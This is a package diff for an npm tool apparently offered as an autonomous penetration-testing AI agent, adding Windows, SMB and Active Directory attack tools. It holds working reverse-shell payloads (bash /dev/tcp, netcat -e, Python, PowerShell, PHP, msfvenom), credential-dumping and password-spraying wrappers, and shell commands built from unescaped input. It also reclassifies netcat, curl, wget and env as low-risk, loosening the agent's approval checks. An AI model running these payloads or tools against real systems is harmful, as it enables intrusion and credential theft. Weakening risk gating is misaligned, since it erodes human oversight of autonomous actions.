pentesting 0.5.9 → 0.6.1

package/dist/{auto-update-CVZG3YKL.js → auto-update-23RX6SWZ.js}

@@ -8,8 +8,8 @@ import {
   readVersionCache,
   semverTuple,
   writeVersionCache
-} from "./chunk-TK3QEEDA.js";
-import "./chunk-CKXQT3ON.js";
+} from "./chunk-6MCOPWPF.js";
+import "./chunk-6RVVWSNN.js";
 import "./chunk-3RG5ZIWI.js";
 export {
   checkForUpdate,

package/dist/{chunk-TK3QEEDA.js → chunk-6MCOPWPF.js}

@@ -1,7 +1,7 @@
 import {
   APP_NAME,
   APP_VERSION
-} from "./chunk-CKXQT3ON.js";
+} from "./chunk-6RVVWSNN.js";
 
 // src/core/update/auto-update.ts
 import { execSync } from "child_process";

package/dist/{chunk-CKXQT3ON.js → chunk-6RVVWSNN.js}

@@ -93,10 +93,47 @@ var TOOL_NAME = {
   READ_FILE: "read_file",
   WRITE_FILE: "write_file",
   LIST_DIRECTORY: "list_directory",
-  // Network
+  // Network - Basic Connectivity
+  PING: "ping",
+  TRACEROUTE: "traceroute",
   RUSTSCAN: "rustscan",
   NMAP_SCAN: "nmap_scan",
+  MASSCAN: "masscan",
   TCPDUMP_CAPTURE: "tcpdump_capture",
+  NETCAT: "netcat",
+  // DNS & Subdomain
+  DIG: "dig",
+  HOST: "host",
+  NSLOOKUP: "nslookup",
+  WHOIS: "whois",
+  SUBFINDER: "subfinder",
+  AMASS: "amass",
+  DNSENUM: "dnsenum",
+  // Web Recon & Tech Identification
+  WHATWEB: "whatweb",
+  HTTPX: "httpx",
+  NUCLEI: "nuclei",
+  NIKTO: "nikto",
+  FFUF: "ffuf",
+  FEROXBUSTER: "feroxbuster",
+  WAYBACKURLS: "waybackurls",
+  // Windows/SMB/AD
+  SMB_ENUM: "smb_enum",
+  ENUM4LINUX: "enum4linux",
+  CRACKMAPEXEC: "crackmapexec",
+  SMBCLIENT: "smbclient",
+  RPCCLIENT: "rpcclient",
+  WINRM: "winrm",
+  RDP_CHECK: "rdp_check",
+  LDAP_SEARCH: "ldap_search",
+  KERBRUTE: "kerbrute",
+  BLOODHOUND: "bloodhound",
+  // Database Clients  
+  MSSQL_CLIENT: "mssql_client",
+  MYSQL_CLIENT: "mysql_client",
+  PSQL_CLIENT: "psql_client",
+  REDIS_CLI: "redis_cli",
+  MONGO_CLIENT: "mongo_client",
   // Web
   WEB_REQUEST: "web_request",
   DIRECTORY_BRUTEFORCE: "directory_bruteforce",
@@ -117,6 +154,7 @@ var TOOL_NAME = {
   // Post-Exploitation
   SETUP_TUNNEL: "setup_tunnel",
   LATERAL_MOVEMENT: "lateral_movement",
+  REVERSE_SHELL: "reverse_shell",
   // Reporting
   REPORT_FINDING: "report_finding",
   TAKE_SCREENSHOT: "take_screenshot"

package/dist/index.js

@@ -15,7 +15,7 @@ import {
   PHASE_STATUS,
   THOUGHT_TYPE,
   TOOL_NAME
-} from "./chunk-CKXQT3ON.js";
+} from "./chunk-6RVVWSNN.js";
 import {
   __require
 } from "./chunk-3RG5ZIWI.js";
@@ -365,6 +365,366 @@ Use for:
     }
   }
 ];
+var WINDOWS_TOOLS = [
+  {
+    name: TOOL_NAME.NETCAT,
+    description: `Netcat (nc) - The TCP/IP Swiss Army Knife.
+
+MODES:
+- connect: Connect to a host/port
+- listen: Listen for incoming connections
+- scan: Port scanning (use rustscan instead for speed)
+- transfer: File transfer
+- reverse_shell: Set up reverse shell listener
+
+EXAMPLES:
+- Banner grab: nc -nv 10.10.10.5 21
+- Listener: nc -lvnp 4444
+- Connect: nc 10.10.10.5 4444
+- Send file: nc -nv 10.10.10.5 4444 < file.txt`,
+    input_schema: {
+      type: "object",
+      properties: {
+        mode: { type: "string", enum: ["connect", "listen", "scan", "transfer"], description: "Operation mode" },
+        host: { type: "string", description: "Target host (for connect mode)" },
+        port: { type: "number", description: "Port number" },
+        listen: { type: "boolean", description: "Listen mode (-l)" },
+        verbose: { type: "boolean", description: "Verbose output (-v)" },
+        udp: { type: "boolean", description: "UDP mode (-u)" },
+        execute: { type: "string", description: "Execute command on connect (-e)" },
+        timeout: { type: "number", description: "Timeout in seconds (-w)" }
+      },
+      required: ["port"]
+    }
+  },
+  {
+    name: TOOL_NAME.SMB_ENUM,
+    description: `SMB enumeration - Enumerate Windows shares, users, groups.
+
+QUICK SMB CHECKS:
+1. List shares: smbclient -L //target -N
+2. Anonymous access: smbclient //target/share -N
+3. Null session: rpcclient -U "" -N target`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP/hostname" },
+        username: { type: "string", description: "Username (empty for null session)" },
+        password: { type: "string", description: "Password (empty for null session)" },
+        domain: { type: "string", description: "Domain name" },
+        shares: { type: "boolean", description: "List shares" },
+        users: { type: "boolean", description: "Enumerate users" },
+        groups: { type: "boolean", description: "Enumerate groups" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.ENUM4LINUX,
+    description: `enum4linux - Windows/Samba enumeration tool.
+
+EXTRACTS:
+- User listing, Group listing
+- Share enumeration
+- Password policy
+- OS information
+- RID cycling for user enumeration`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        all: { type: "boolean", description: "Do all enumeration (-a)" },
+        users: { type: "boolean", description: "Get user list (-U)" },
+        shares: { type: "boolean", description: "Get share list (-S)" },
+        policies: { type: "boolean", description: "Get password policies (-P)" },
+        groups: { type: "boolean", description: "Get group info (-G)" },
+        username: { type: "string", description: "Username for auth" },
+        password: { type: "string", description: "Password for auth" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.CRACKMAPEXEC,
+    description: `CrackMapExec (CME) - Swiss army knife for Windows/AD pentesting.
+
+PROTOCOLS: smb, winrm, mssql, ssh, ldap
+FEATURES:
+- Password spraying
+- Credential validation  
+- Pass-the-Hash
+- Command execution
+- Credential dumping (SAM, LSA, NTDS.dit)
+- Mimikatz, Bloodhound integration
+
+EXAMPLES:
+- cme smb 10.10.10.0/24 -u user -p pass
+- cme smb target -u user -H hash --shares
+- cme smb target -u user -p pass -x "whoami"
+- cme smb target -u user -p pass --sam`,
+    input_schema: {
+      type: "object",
+      properties: {
+        protocol: { type: "string", enum: ["smb", "winrm", "mssql", "ssh", "ldap"], description: "Protocol to use" },
+        target: { type: "string", description: "Target IP/CIDR/hostname" },
+        username: { type: "string", description: "Username or file" },
+        password: { type: "string", description: "Password or file" },
+        hash: { type: "string", description: "NTLM hash for pass-the-hash" },
+        domain: { type: "string", description: "Domain name" },
+        command: { type: "string", description: "Command to execute (-x)" },
+        shares: { type: "boolean", description: "Enumerate shares" },
+        users: { type: "boolean", description: "Enumerate users" },
+        pass_pol: { type: "boolean", description: "Get password policy" },
+        sam: { type: "boolean", description: "Dump SAM hashes" },
+        lsa: { type: "boolean", description: "Dump LSA secrets" },
+        ntds: { type: "boolean", description: "Dump NTDS.dit (DC only)" }
+      },
+      required: ["protocol", "target"]
+    }
+  },
+  {
+    name: TOOL_NAME.SMBCLIENT,
+    description: `smbclient - FTP-like client for SMB/CIFS resources.
+
+COMMANDS:
+- List shares: smbclient -L //target -N
+- Connect: smbclient //target/share -U user%pass
+- Download: get file.txt
+- Upload: put local.txt
+- Recurse download: recurse; prompt; mget *`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target (//IP/share)" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        command: { type: "string", description: "Command to run (-c)" },
+        list: { type: "boolean", description: "List shares only (-L)" },
+        no_pass: { type: "boolean", description: "No password (-N)" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.RPCCLIENT,
+    description: `rpcclient - Tool for MS-RPC functions.
+
+USEFUL COMMANDS:
+- enumdomusers: List domain users
+- enumdomgroups: List domain groups  
+- queryuser 0x[RID]: Get user info
+- querygroupmem 0x[RID]: Get group members
+- lookupnames [user]: Get user SID
+- lookupsids [SID]: Get username from SID`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        command: { type: "string", description: "RPC command to run (-c)" },
+        no_pass: { type: "boolean", description: "Null session (-N)" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.WINRM,
+    description: `evil-winrm - WinRM shell for Windows post-exploitation.
+
+FEATURES:
+- Interactive PowerShell session
+- Pass-the-Hash and Kerberos auth
+- In-memory script/DLL loading
+- File upload/download
+- AMSI bypass
+
+PORTS: 5985 (HTTP), 5986 (HTTPS)`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        hash: { type: "string", description: "NTLM hash (pass-the-hash)" },
+        ssl: { type: "boolean", description: "Use SSL (port 5986)" },
+        scripts: { type: "string", description: "PowerShell scripts path" },
+        executables: { type: "string", description: "Executables path" }
+      },
+      required: ["target", "username"]
+    }
+  },
+  {
+    name: TOOL_NAME.RDP_CHECK,
+    description: `RDP connection testing and exploitation.
+
+CHECKS:
+- rdp_check.py: Verify RDP access
+- xfreerdp: Full RDP connection
+- BlueKeep scanner (CVE-2019-0708)
+
+PORTS: 3389 (default)`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        hash: { type: "string", description: "NTLM hash" },
+        domain: { type: "string", description: "Domain" },
+        check_only: { type: "boolean", description: "Only check access (no connect)" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.LDAP_SEARCH,
+    description: `LDAP enumeration for Active Directory.
+
+COMMON QUERIES:
+- Users: (objectClass=user)
+- Computers: (objectClass=computer)
+- Groups: (objectClass=group)
+- Admins: (memberOf=CN=Domain Admins,...)
+- SPNs: (servicePrincipalName=*)
+
+PORTS: 389 (LDAP), 636 (LDAPS), 3268 (Global Catalog)`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Domain controller IP" },
+        base_dn: { type: "string", description: "Base DN (e.g., DC=domain,DC=local)" },
+        filter: { type: "string", description: "LDAP filter" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        attributes: { type: "string", description: "Attributes to retrieve" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.KERBRUTE,
+    description: `Kerbrute - Kerberos bruteforce and enumeration.
+
+MODES:
+- userenum: Enumerate valid usernames via Kerberos
+- passwordspray: Password spray attack
+- bruteuser: Brute force single user
+
+STEALTHY: Uses Kerberos pre-auth, minimal logs`,
+    input_schema: {
+      type: "object",
+      properties: {
+        mode: { type: "string", enum: ["userenum", "passwordspray", "bruteuser"], description: "Attack mode" },
+        dc: { type: "string", description: "Domain controller" },
+        domain: { type: "string", description: "Domain name" },
+        users: { type: "string", description: "Username or wordlist" },
+        passwords: { type: "string", description: "Password or wordlist" }
+      },
+      required: ["mode", "dc", "domain"]
+    }
+  },
+  {
+    name: TOOL_NAME.BLOODHOUND,
+    description: `BloodHound - Active Directory attack path visualization.
+
+COLLECTORS:
+- SharpHound (Windows): .exe or .ps1
+- bloodhound-python (Linux): Remote collection
+
+DATA COLLECTED:
+- Users, Groups, Computers
+- Sessions, Local Admins
+- Group memberships, ACLs
+- Trust relationships`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Domain controller" },
+        domain: { type: "string", description: "Domain name" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        collection: { type: "string", enum: ["all", "default", "session", "acl", "trusts"], description: "Collection method" },
+        zip: { type: "boolean", description: "Zip output files" }
+      },
+      required: ["domain", "username", "password"]
+    }
+  },
+  {
+    name: TOOL_NAME.MSSQL_CLIENT,
+    description: `MSSQL client for Microsoft SQL Server.
+
+USES impacket-mssqlclient / mssqlclient.py
+
+FEATURES:
+- SQL query execution
+- xp_cmdshell command execution
+- File read/write
+- Linked server attacks
+
+PORT: 1433`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        username: { type: "string", description: "Username (user@domain or domain/user)" },
+        password: { type: "string", description: "Password" },
+        hash: { type: "string", description: "NTLM hash" },
+        query: { type: "string", description: "SQL query to execute" },
+        windows_auth: { type: "boolean", description: "Use Windows authentication" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.MYSQL_CLIENT,
+    description: `MySQL client for database access.
+
+PORT: 3306
+
+COMMON COMMANDS:
+- show databases;
+- use database_name;
+- show tables;
+- SELECT * FROM users;`,
+    input_schema: {
+      type: "object",
+      properties: {
+        target: { type: "string", description: "Target IP" },
+        username: { type: "string", description: "Username" },
+        password: { type: "string", description: "Password" },
+        database: { type: "string", description: "Database name" },
+        query: { type: "string", description: "SQL query to execute" }
+      },
+      required: ["target"]
+    }
+  },
+  {
+    name: TOOL_NAME.REVERSE_SHELL,
+    description: `Generate reverse shell payloads.
+
+TYPES:
+- bash: Bash TCP reverse shell
+- nc: Netcat reverse shell
+- python: Python reverse shell
+- powershell: PowerShell reverse shell (Windows)
+- php: PHP reverse shell (Web shells)
+- msfvenom: Metasploit payload generation
+
+LISTENER: nc -lvnp PORT`,
+    input_schema: {
+      type: "object",
+      properties: {
+        type: { type: "string", enum: ["bash", "nc", "python", "powershell", "php", "msfvenom"], description: "Shell type" },
+        lhost: { type: "string", description: "Your IP (listener)" },
+        lport: { type: "number", description: "Your port (listener)" },
+        platform: { type: "string", enum: ["linux", "windows"], description: "Target platform" },
+        encode: { type: "boolean", description: "Base64 encode payload" }
+      },
+      required: ["type", "lhost", "lport"]
+    }
+  }
+];
 var WEB_TOOLS = [
   {
     name: TOOL_NAME.WEB_REQUEST,
@@ -701,6 +1061,7 @@ var REPORT_TOOLS = [
 var ALL_TOOLS = [
   ...SYSTEM_TOOLS,
   ...NETWORK_TOOLS,
+  ...WINDOWS_TOOLS,
   ...WEB_TOOLS,
   ...EXPLOIT_TOOLS,
   ...CREDENTIAL_TOOLS,
@@ -878,6 +1239,49 @@ async function executeToolCall(toolName, input) {
       case "lateral_movement":
         result = await executeLateralMovement(input);
         break;
+      // Windows / SMB / AD Tools
+      case "netcat":
+        result = await executeNetcat(input);
+        break;
+      case "smb_enum":
+        result = await executeSmbEnum(input);
+        break;
+      case "enum4linux":
+        result = await executeEnum4linux(input);
+        break;
+      case "crackmapexec":
+        result = await executeCrackmapexec(input);
+        break;
+      case "smbclient":
+        result = await executeSmbclient(input);
+        break;
+      case "rpcclient":
+        result = await executeRpcclient(input);
+        break;
+      case "winrm":
+        result = await executeWinrm(input);
+        break;
+      case "rdp_check":
+        result = await executeRdpCheck(input);
+        break;
+      case "ldap_search":
+        result = await executeLdapSearch(input);
+        break;
+      case "kerbrute":
+        result = await executeKerbrute(input);
+        break;
+      case "bloodhound":
+        result = await executeBloodhound(input);
+        break;
+      case "mssql_client":
+        result = await executeMssqlClient(input);
+        break;
+      case "mysql_client":
+        result = await executeMysqlClient(input);
+        break;
+      case "reverse_shell":
+        result = await executeReverseShell(input);
+        break;
       // report
       case "report_finding":
         result = await reportFinding(input);
@@ -1331,6 +1735,204 @@ const { chromium } = require('playwright');
   }
   return executeBash(`script -q /dev/null -c "cat" | tee "${filename || "terminal.txt"}"`);
 }
+async function executeNetcat(input) {
+  const { mode, host, port, listen, verbose, udp, execute, timeout } = input;
+  let cmd = "nc";
+  if (verbose) cmd += " -v";
+  if (udp) cmd += " -u";
+  if (timeout) cmd += ` -w ${timeout}`;
+  if (listen || mode === "listen") {
+    cmd += ` -lnp ${port}`;
+    if (execute) cmd += ` -e ${execute}`;
+  } else {
+    cmd += ` -n ${host} ${port}`;
+  }
+  return executeBash(cmd, { timeout: (timeout || 30) * 1e3 });
+}
+async function executeSmbEnum(input) {
+  const { target, username, password, shares, users, groups } = input;
+  const commands = [];
+  if (shares || !users && !groups) {
+    commands.push(`smbclient -L //${target} -N 2>/dev/null || echo "Shares listing failed"`);
+  }
+  if (users) {
+    commands.push(`rpcclient -U "" -N ${target} -c "enumdomusers" 2>/dev/null || echo "User enum failed"`);
+  }
+  if (groups) {
+    commands.push(`rpcclient -U "" -N ${target} -c "enumdomgroups" 2>/dev/null || echo "Group enum failed"`);
+  }
+  if (username && password) {
+    commands.push(`smbclient -L //${target} -U "${username}%${password}" 2>/dev/null`);
+  }
+  const cmd = commands.join(' && echo "---" && ');
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeEnum4linux(input) {
+  const { target, all, users, shares, policies, groups, username, password } = input;
+  let cmd = `enum4linux`;
+  if (all) {
+    cmd += " -a";
+  } else {
+    if (users) cmd += " -U";
+    if (shares) cmd += " -S";
+    if (policies) cmd += " -P";
+    if (groups) cmd += " -G";
+  }
+  if (username && password) {
+    cmd += ` -u "${username}" -p "${password}"`;
+  }
+  cmd += ` ${target}`;
+  return executeBash(cmd, { timeout: 3e5 });
+}
+async function executeCrackmapexec(input) {
+  const { protocol, target, username, password, hash, domain, command, shares, users, pass_pol, sam, lsa, ntds } = input;
+  let cmd = `crackmapexec ${protocol} ${target}`;
+  if (username) cmd += ` -u "${username}"`;
+  if (password) cmd += ` -p "${password}"`;
+  if (hash) cmd += ` -H "${hash}"`;
+  if (domain) cmd += ` -d "${domain}"`;
+  if (command) cmd += ` -x "${command}"`;
+  if (shares) cmd += " --shares";
+  if (users) cmd += " --users";
+  if (pass_pol) cmd += " --pass-pol";
+  if (sam) cmd += " --sam";
+  if (lsa) cmd += " --lsa";
+  if (ntds) cmd += " --ntds";
+  return executeBash(cmd, { timeout: 3e5 });
+}
+async function executeSmbclient(input) {
+  const { target, username, password, command, list, no_pass } = input;
+  let cmd = `smbclient ${target}`;
+  if (list) {
+    cmd = `smbclient -L ${String(target).replace(/\/\//g, "")}`;
+  }
+  if (username && password) {
+    cmd += ` -U "${username}%${password}"`;
+  } else if (no_pass) {
+    cmd += " -N";
+  }
+  if (command && !list) {
+    cmd += ` -c "${command}"`;
+  }
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeRpcclient(input) {
+  const { target, username, password, command, no_pass } = input;
+  let cmd = `rpcclient ${target}`;
+  if (username && password) {
+    cmd += ` -U "${username}%${password}"`;
+  } else if (no_pass) {
+    cmd += ' -U "" -N';
+  }
+  if (command) {
+    cmd += ` -c "${command}"`;
+  }
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeWinrm(input) {
+  const { target, username, password, hash, ssl } = input;
+  let cmd = `evil-winrm -i ${target} -u "${username}"`;
+  if (password) cmd += ` -p "${password}"`;
+  if (hash) cmd += ` -H "${hash}"`;
+  if (ssl) cmd += " -S";
+  cmd += ' -c "whoami && hostname && ipconfig /all"';
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeRdpCheck(input) {
+  const { target, username, password, hash, domain, check_only } = input;
+  if (check_only) {
+    return executeBash(`nmap -p 3389 --open -sV ${target}`, { timeout: 3e4 });
+  }
+  let cmd = `xfreerdp /v:${target}`;
+  if (username) cmd += ` /u:"${username}"`;
+  if (password) cmd += ` /p:"${password}"`;
+  if (hash) cmd += ` /pth:"${hash}"`;
+  if (domain) cmd += ` /d:"${domain}"`;
+  cmd += " /cert-ignore +auth-only";
+  return executeBash(cmd, { timeout: 3e4 });
+}
+async function executeLdapSearch(input) {
+  const { target, base_dn, filter, username, password, attributes } = input;
+  let cmd = `ldapsearch -x -H ldap://${target}`;
+  if (base_dn) cmd += ` -b "${base_dn}"`;
+  if (username) cmd += ` -D "${username}"`;
+  if (password) cmd += ` -w "${password}"`;
+  cmd += ` "${filter || "(objectClass=*)"}"`;
+  if (attributes) cmd += ` ${attributes}`;
+  return executeBash(cmd, { timeout: 12e4 });
+}
+async function executeKerbrute(input) {
+  const { mode, dc, domain, users, passwords } = input;
+  let cmd = `kerbrute ${mode}`;
+  if (mode === "userenum") {
+    cmd += ` --dc ${dc} -d ${domain} ${users}`;
+  } else if (mode === "passwordspray") {
+    cmd += ` --dc ${dc} -d ${domain} ${users} ${passwords}`;
+  } else if (mode === "bruteuser") {
+    cmd += ` --dc ${dc} -d ${domain} ${users} ${passwords}`;
+  }
+  return executeBash(cmd, { timeout: 6e5 });
+}
+async function executeBloodhound(input) {
+  const { domain, username, password, collection, zip } = input;
+  let cmd = `bloodhound-python -u "${username}" -p "${password}" -d ${domain}`;
+  if (collection) cmd += ` -c ${collection}`;
+  if (zip) cmd += " --zip";
+  return executeBash(cmd, { timeout: 6e5 });
+}
+async function executeMssqlClient(input) {
+  const { target, username, password, hash, query, windows_auth } = input;
+  let cmd = `impacket-mssqlclient`;
+  if (windows_auth) {
+    cmd += ` "${username}"@${target}`;
+  } else {
+    cmd += ` ${username}:${password}@${target}`;
+  }
+  if (hash) cmd += ` -hashes :${hash}`;
+  if (query) {
+    cmd += ` -q "${query}"`;
+  }
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeMysqlClient(input) {
+  const { target, username, password, database, query } = input;
+  let cmd = `mysql -h ${target}`;
+  if (username) cmd += ` -u "${username}"`;
+  if (password) cmd += ` -p"${password}"`;
+  if (database) cmd += ` ${database}`;
+  if (query) {
+    cmd += ` -e "${query}"`;
+  }
+  return executeBash(cmd, { timeout: 6e4 });
+}
+async function executeReverseShell(input) {
+  const { type, lhost, lport, platform: platform2, encode } = input;
+  const shells = {
+    bash: `bash -i >& /dev/tcp/${lhost}/${lport} 0>&1`,
+    nc: `nc -e /bin/bash ${lhost} ${lport}`,
+    python: `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${lhost}",${lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'`,
+    powershell: `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('${lhost}',${lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`,
+    php: `php -r '$sock=fsockopen("${lhost}",${lport});exec("/bin/bash <&3 >&3 2>&3");'`
+  };
+  if (type === "msfvenom") {
+    const payload = platform2 === "windows" ? "windows/x64/shell_reverse_tcp" : "linux/x64/shell_reverse_tcp";
+    return executeBash(`msfvenom -p ${payload} LHOST=${lhost} LPORT=${lport} -f exe -o /tmp/shell.exe && echo "Payload saved to /tmp/shell.exe"`);
+  }
+  let shellCmd = shells[type] || shells.bash;
+  if (encode) {
+    shellCmd = Buffer.from(shellCmd).toString("base64");
+    shellCmd = `echo "${shellCmd}" | base64 -d | bash`;
+  }
+  return {
+    success: true,
+    output: `Reverse Shell Payload (${type}):
+
+${shellCmd}
+
+Listener: nc -lvnp ${lport}`,
+    duration: 0
+  };
+}
 
 // src/core/hooks/hook-executor.ts
 import { spawn as spawn2 } from "child_process";
@@ -1701,23 +2303,124 @@ var HIGH_RISK_PATTERNS = [
   /meterpreter/i,
   /mimikatz/i
 ];
+var LOW_RISK_TOOLS = [
+  "ping",
+  "traceroute",
+  "tracert",
+  "mtr",
+  "dig",
+  "host",
+  "nslookup",
+  "whois",
+  "dnsenum",
+  "curl",
+  "wget",
+  "httpx",
+  "whatweb",
+  "rustscan",
+  "nmap_scan",
+  "nmap",
+  "masscan",
+  "subfinder",
+  "amass",
+  "assetfinder",
+  "ffuf",
+  "gobuster",
+  "feroxbuster",
+  "dirsearch",
+  "smbclient",
+  "rpcclient",
+  "enum4linux",
+  "ldapsearch",
+  "netcat",
+  "nc",
+  "telnet",
+  "ftp",
+  "read_file",
+  "list_directory",
+  "cat",
+  "ls",
+  "find",
+  "grep",
+  "searchsploit",
+  "nikto",
+  "nuclei",
+  "web_request",
+  "directory_bruteforce"
+];
+var LOW_RISK_PATTERNS = [
+  /^ping\s/i,
+  /^traceroute\s/i,
+  /^tracert\s/i,
+  /^mtr\s/i,
+  /^dig\s/i,
+  /^host\s/i,
+  /^nslookup\s/i,
+  /^whois\s/i,
+  /^curl\s/i,
+  /^wget\s/i,
+  /^nmap\s/i,
+  /^rustscan\s/i,
+  /^masscan\s/i,
+  /^subfinder/i,
+  /^amass\s/i,
+  /^ffuf\s/i,
+  /^gobuster\s/i,
+  /^feroxbuster\s/i,
+  /^whatweb\s/i,
+  /^httpx\s/i,
+  /^nikto\s/i,
+  /^nuclei\s/i,
+  /^smbclient\s/i,
+  /^rpcclient\s/i,
+  /^enum4linux\s/i,
+  /^ldapsearch\s/i,
+  /^crackmapexec\s.*--shares/i,
+  /^crackmapexec\s.*--users/i,
+  /^searchsploit\s/i,
+  /^cat\s/i,
+  /^ls\s/i,
+  /^find\s/i,
+  /^grep\s/i,
+  /^head\s/i,
+  /^tail\s/i,
+  /^file\s/i,
+  /^strings\s/i,
+  /^netstat/i,
+  /^ss\s/i,
+  /^arp\s/i,
+  /^ip\s+a/i,
+  /^ifconfig/i,
+  /^id$/i,
+  /^whoami$/i,
+  /^uname/i,
+  /^hostname/i,
+  /^pwd$/i,
+  /^env$/i,
+  /^echo\s/i
+];
 function assessRisk(toolName, toolInput) {
   const inputStr = JSON.stringify(toolInput).toLowerCase();
+  const command = toolInput.command || "";
   for (const pattern of HIGH_RISK_PATTERNS) {
-    if (pattern.test(inputStr)) {
+    if (pattern.test(inputStr) || pattern.test(command)) {
       return "critical";
     }
   }
-  if (CRITICAL_TOOLS.includes(toolName)) {
-    return "high";
+  if (LOW_RISK_TOOLS.includes(toolName)) {
+    return "low";
   }
-  if (toolName.includes("script") || toolName.includes("exec")) {
-    return "medium";
+  if (toolName === "bash" && command) {
+    for (const pattern of LOW_RISK_PATTERNS) {
+      if (pattern.test(command.trim())) {
+        return "low";
+      }
+    }
   }
-  if (toolName.includes("scan") || toolName.includes("request")) {
-    return "medium";
+  if (CRITICAL_TOOLS.includes(toolName)) {
+    return "high";
   }
-  return "low";
+  return "medium";
 }
 function generateRequestId() {
   return `approval_${Date.now()}_${Math.random().toString(36).substring(2, 8)}`;
@@ -5349,7 +6052,7 @@ var App = ({ autoApprove = false, target }) => {
         setCheckpointCount(contextManagerRef.current?.getCheckpoints().length || 0);
       }
     });
-    import("./auto-update-CVZG3YKL.js").then(({ checkForUpdateAsync, formatUpdateNotification }) => {
+    import("./auto-update-23RX6SWZ.js").then(({ checkForUpdateAsync, formatUpdateNotification }) => {
       checkForUpdateAsync().then((result) => {
         if (result.hasUpdate) {
           const notification = formatUpdateNotification(result);
@@ -5943,7 +6646,7 @@ ${list}`);
           return;
         case "update":
           try {
-            const { checkForUpdate, formatUpdateNotification, doUpdate } = await import("./update-B6HRINH6.js");
+            const { checkForUpdate, formatUpdateNotification, doUpdate } = await import("./update-6I3E5PSP.js");
             const result = checkForUpdate(true);
             if (result.hasUpdate) {
               const notification = formatUpdateNotification(result);

package/dist/{update-B6HRINH6.js → update-6I3E5PSP.js}

@@ -8,8 +8,8 @@ import {
   readVersionCache,
   semverTuple,
   writeVersionCache
-} from "./chunk-TK3QEEDA.js";
-import "./chunk-CKXQT3ON.js";
+} from "./chunk-6MCOPWPF.js";
+import "./chunk-6RVVWSNN.js";
 import "./chunk-3RG5ZIWI.js";
 export {
   checkForUpdate,

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.5.9",
+  "version": "0.6.1",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/index.js",